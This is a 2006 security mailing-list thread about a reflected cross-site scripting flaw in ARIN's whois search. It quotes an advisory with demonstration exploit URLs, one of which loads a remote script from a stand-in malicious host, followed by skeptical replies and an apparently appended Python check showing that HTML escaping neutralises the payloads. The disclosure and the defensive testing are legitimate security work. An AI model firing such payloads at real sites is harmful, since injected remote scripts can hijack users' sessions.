Right, did this ever work? This fails for me, man. How did you verify it?
Steven wrote:
> ok?
>
> So what exactly are you going to exploit here? This site doesn't have any
> logins or even use cookies. Are you going to trick a user into entering in a
> credit card number before they can search the whois database?
>
> I think that XSS in many instances is a serious issue. Many of the XSS
> issues reported on FD are rarely of much consequence but could theoretically
> lead to a session hijack or tricking the user into a fake login screen.
> However, in this instance I fail to see what the point could possibly be? If
> it is that you can simply run javascript then so what? Close to 100% of any
> webhosting provider on the internet will let you upload your own javascript.
> Might as well report that geocities.com is vulnerable to XSS because you
> could upload an html file with javascript on it.
>
> Anyway.. that's my take on this. Feel free to correct me.. I don't mind.
>
> Steven
>
> ----- Original Message -----
> From: Terminal Entry
> To: Full Disclosure ; Bug Traq
> Sent: Thursday, March 02, 2006 11:17 PM
> Subject: [Full-disclosure] Arin.net XSS
>
> Title
> ARIN.NET input validation holes in "?queryinput=" allow remote users to
> conduct cross-site scripting attacks
>
> Notification
> Multiple attempts to contact Arin site administrators went unanswered
>
> Exploit Included: Yes
>
> Description
> The "?queryinput=" script does not properly validate user-supplied input in
> several parameters to filter HTML code. A remote user can create a specially
> crafted URL that, when loaded by a target user, will cause arbitrary
> scripting code to be executed by the target user's browser.
>
> Some demonstration exploit URLs are provided:
>
> http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
>
> http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E
>
> http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
>
> Discovered by Terminal Entry security [.at.] peadro (.)net
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

--
Regards,
Adriel T. Desautels
Harvard Security Group
http://www.harvardsecuritygroup.com
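
The advisory quoted above describes the `queryinput` value being reflected without HTML filtering. As an added example (not code from this thread or from ARIN), the Python script below decodes the two distinct demonstration URLs from the advisory and uses an HTML parser to check which elements each rendering would create, with and without entity encoding; the result-page template and all function names are assumptions.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# The two distinct demonstration URLs quoted in the advisory above.
ADVISORY_URLS = [
    "http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E",
    "http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E",
]

# Hypothetical result page: the real ARIN template is not shown in the thread.
TEMPLATE = "<html><body><p>Results for: {query}</p></body></html>"
EXPECTED_TAGS = ["html", "body", "p"]

def query_value(url):
    """Decode the queryinput parameter the way a web framework would."""
    return parse_qs(urlsplit(url).query)["queryinput"][0]

def render_unsafe(query):
    """Reflect the value verbatim (the behaviour the advisory describes)."""
    return TEMPLATE.format(query=query)

def render_escaped(query):
    """Reflect the value entity-encoded for use as element content."""
    return TEMPLATE.format(query=escape(query, quote=True))

class TagCollector(HTMLParser):
    """Record every start tag an HTML parser recognises in a page."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def injected_tags(page):
    """Start tags found in the parsed page that the template did not supply."""
    collector = TagCollector()
    collector.feed(page)
    collector.close()
    return [t for t in collector.tags if t not in EXPECTED_TAGS]

if __name__ == "__main__":
    for url in ADVISORY_URLS:
        q = query_value(url)
        print(injected_tags(render_unsafe(q)), injected_tags(render_escaped(q)))
```

`html.escape` covers the element-content context used in this template; a value reflected into an attribute, URL or script block needs the encoding for that context instead.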